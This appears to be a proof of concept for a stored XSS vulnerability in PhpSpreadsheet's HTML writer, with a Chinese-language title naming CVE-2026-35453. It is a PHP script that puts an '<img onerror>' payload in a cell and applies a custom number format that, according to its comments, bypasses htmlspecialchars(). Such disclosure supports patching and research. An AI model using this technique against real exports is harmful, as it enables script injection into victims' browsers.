CVE-2026-35453 PhpSpreadsheet 存储型XSS漏洞

<?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Html; $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); // 1. Set malicious payload in a cell $sheet->setCellValue('A1', '<img src=x onerror=alert(1)>'); // 2. Apply the vulnerable custom number format ( "@" with literal text ) // This triggers the early return bypassing htmlspecialchars() $sheet->getStyle('A1')->getNumberFormat()->setFormatCode('@ "items"'); // 3. Write to HTML $writer = new Html($spreadsheet); $writer->save('exploit.html'); // Opening exploit.html in a browser will trigger the XSS alert ?>